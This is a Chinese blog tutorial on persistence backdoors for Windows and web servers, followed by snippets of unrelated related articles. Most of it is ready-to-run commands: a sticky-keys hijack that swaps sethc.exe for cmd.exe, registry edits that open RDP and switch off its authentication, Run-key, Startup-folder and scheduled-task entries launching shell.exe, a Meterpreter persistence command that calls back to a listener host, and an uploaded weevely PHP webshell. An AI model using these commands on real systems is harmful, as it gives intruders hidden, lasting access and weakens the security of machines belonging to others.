列举windows通过编程启动exe程序的方法?_一些简单的持久性后门的方法

news/2024/7/3 18:49:42

一,shift后门

方法1:修改注册表-映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

c01dd92aa42fb1a9b270de055e5ccd77.png891d15455f479bb806add90e36faadd7.png

命令说明:reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。Image File Execution Option 这个目录就是用来设置镜像劫持的,要被劫持的就是命令中的 sethc 粘滞键程序,随后通过 / v 来指定键名,这个键名 debugger 是固定的,然后通过 / t 来指定类型,即 REG_SZ 字符串类型,最后通过 / d 来指定键的值,即被恶意替换的程序,也就是我们的 cmd

开启远程桌面

1,配置防火墙允许远程桌面连接

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

61ad651e848fefdf70d7eb25ef125068.png891d15455f479bb806add90e36faadd7.png
netsh 是 windows 的网络配置命令,advfirewall firewall 意思是防火墙高级设置,add rule 是添加一条规则,name 指定规则名称,protocol 指定协议,dir 指定是出战还是入站,localport 指定端口,action 指定动作 allow 允许。

2,开启远程桌面

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /D 0 /f

655f3b622314891f9d27489d88298883.png891d15455f479bb806add90e36faadd7.png

配置远程桌面:

1,UserAuthentication(用户身份验证选项)设置为0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 

be3a3e5406c433f45616541a5929d6e9.png891d15455f479bb806add90e36faadd7.png

(yes是因为本来就是0,重新写一下) 

1 远程桌面连接之前就进行身份验证

0 远程桌面连接之前不需要进行身份验证,连接到远程桌面的锁屏界面后才进行身份验证

2,securitylayer(安全层)设置为0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0

4df05eafd27d3234694f7941a63ce19b.png891d15455f479bb806add90e36faadd7.png
0 就是连接前使用 rdp 协议进行身份验证,rdp 即远程桌面连接,可以简单理解为就是关闭验证。1 是指在连接前两端协商来进行身份验证,这个是默认值。2 就是使用 tls 协议来进行

0  会直接跳转到锁屏界面

1 需要输入用户名后才能跳转到锁屏界面

方法2:直接替换sethc.exe文件

cd C:\windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe

首先查看该目录下是否存在sethc.exe文件 

64eb14c41266c183d34e3dda0806770d.png891d15455f479bb806add90e36faadd7.png

如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:

cd22cd929f38e4ec696a01d12ee4dc1d.png891d15455f479bb806add90e36faadd7.png

 将sethc.exe的所有者更改为本地管理员administrator

1027ed79251d004f7955ac2a057b9d9f.png891d15455f479bb806add90e36faadd7.png

给sethc.exe文件的所有控制权给administrator用户

b9c5772d1f58e29dc4bb58a0dae568a8.png891d15455f479bb806add90e36faadd7.png

将原本的sethc.exe文件进行备份

120578a684759e8667a9e0db8d969c42.png891d15455f479bb806add90e36faadd7.png

用cmd.exe替换sethc.exe

cb6d56d28a85c7fcea9820425ce5e7b4.png891d15455f479bb806add90e36faadd7.png

执行5下shift键,shift后门建立成功。

fbb4bf273a17392290026a7fe2bc1192.png891d15455f479bb806add90e36faadd7.png

二,启动项后门

方法一:注册表添加启动项

注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe"

/v 指定键名   /t 指定类型,即 REG_SZ 字符串类型  /d 指定键的值

Run 键值代表着开机启动项,也就是说在这个项下的键值会随着开机启动

其实就是将需要执行的后门程序或脚本路径写入到注册表当中,当管理员重新登陆的时候,就会执行后门程序。

5e84bbd7d49a8d9c0ef4a5015a34e94a.png891d15455f479bb806add90e36faadd7.png

方法二:cmd添加启动项

1,切换到启动项目录

cd C:/Users/shy/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/

e38fc1b4f9642dac74319da049160e6c.png891d15455f479bb806add90e36faadd7.png

2,将后门文件或者执行脚本移动到启动项目录下

f63bfdf5ac9cf82ef42dcd6a3a330b0b.png891d15455f479bb806add90e36faadd7.png
3,重启启动启动项

三:计划任务后门

命令:schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1

以上的命令会在每小时执行一次shell.exe,在win7及以下的系统使用at命令代替schtasks

四:meterpreter后门

meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A 自动启动一个匹配的exploit / multi / handler来连接到代理 -L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。-S 作为服务自动启动该木马(具有SYSTEM权限) -T 要使用的备用可执行模板 -U 用户登录时自动启动该木马 -X 系统引导时自动启动该木马 -h 这个帮助菜单 -i 每次连接尝试之间的时间间隔(秒) -p 运行Metasploit的系统正在侦听的端口 -r 运行Metasploit监听连接的系统的IP

五:weevely后门

weevely是一款基于python编写的webshell生成、管理工具。

weevely  generate        生成指定路径带密码的php文件

在shy目录下生成密码为shy的PHP后门文件shy.php      

76192dedca5bbf0d556b34cbf946203d.png891d15455f479bb806add90e36faadd7.png

查看生成的shy.php的内容

91913a4adaf4a038a9d78279442129dd.png891d15455f479bb806add90e36faadd7.png

上传到网站根目录,

c8cb6d0d1555269e349a0a073602b0dd.png891d15455f479bb806add90e36faadd7.png

使用weevely连接

weevely    连接php文件

7c6b53e3f67d0ccecc5989dc9276aaf9.png891d15455f479bb806add90e36faadd7.png

执行系统命令

05a2309e7858c39bf4ed6fce07280097.png891d15455f479bb806add90e36faadd7.png

bfd68ba72827511a61ff5e556dc0cb7d.png


http://www.niftyadmin.cn/n/3661323.html

相关文章

[需求]需求分析能力之样例:引入领域模型的前前后后

2006年07月27日 13:50:00 需求分析能力之样例:引入领域模型的前前后后曾经遇到过一个系统需求,需求分析人员在听到客户说要增加"修改员工密码"功能后,就原封不动的把这个功能写在了文档中。如果把这个需求交给实现人员,…

thinkphp漏洞_CNNVD关于ThinkPHP远程代码执行漏洞情况的通报

近日,国家信息安全漏洞库(CNNVD)收到关于ThinkPHP 5.0远程代码执行漏洞(CNNVD-201901-445)【http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVDCNNVD-201901-445】情况的报送。成功利用此漏洞的攻击者可以对目标系统进行远程代码执行攻击。ThinkPHP 5.0.x–5.0.…

[领域]一个简单的UML应用题

2006年07月26日 15:08:00 UML是一个语义丰富的建模语言,但是,在实际的使用过程中,出现了很多滥用和误用的情况。如果,你只是关心使用UML的最少集合进行建模,是可以的(我个…

内存都是由半导体器件构成的_Linux 内存相关问题汇总

linux 内存是后台开发人员,需要深入了解的计算机资源。合理的使用内存,有助于提升机器的性能和稳定性。本文主要介绍 linux 内存组织结构和页面布局,内存碎片产生原因和优化算法,linux 内核几种内存管理的方法,内存使用…

tensorboard可视化_TensorBoard可视化实战(三)

概述在《TensorBoard可视化实战(二)》中讲述了如何使生成的图更具有可阅读性,但是生成的可阅读参数较少,本文旨在增加TensorBoard的展示信息。mnist_board_2.py代码import osimport tensorflow as tfLOGDIR ./mnistmnist tf.contrib.learn.datasets.mn…

[个人]百度裁员录音门

2006年07月17日 20:32:00 手头有个录音,朋友给我的,说:"听听,百度裁员的,特无耻"。耐心听完,第一感觉,是骂我的朋友,"怎么能说无耻呢?玷污了无耻这个词了…

linux中使用u盘和光驱的命令_Linux基础命令的使用

一、基础知识操作系统的组合结构计算机的诞生的时间大概是上个世纪40年代,诞生于美国宾夕法尼亚大学。此时的计算机的结构已经进化有5大基本部件组成。计算机的5大部件都遵循冯诺依曼体系,分别为:运算器、控制器、存储器、输入设备、输出设备…

[豆趣]儿童读物

2006年10月11日 22:51:00 豆娘打电话说,自己受了刺激。追问下,才说:后面楼的某个小娃子,比豆少要小半岁,居然识1000个字,会算100以内的加减,会背诵小九九。。。末了,豆娘叹口气&…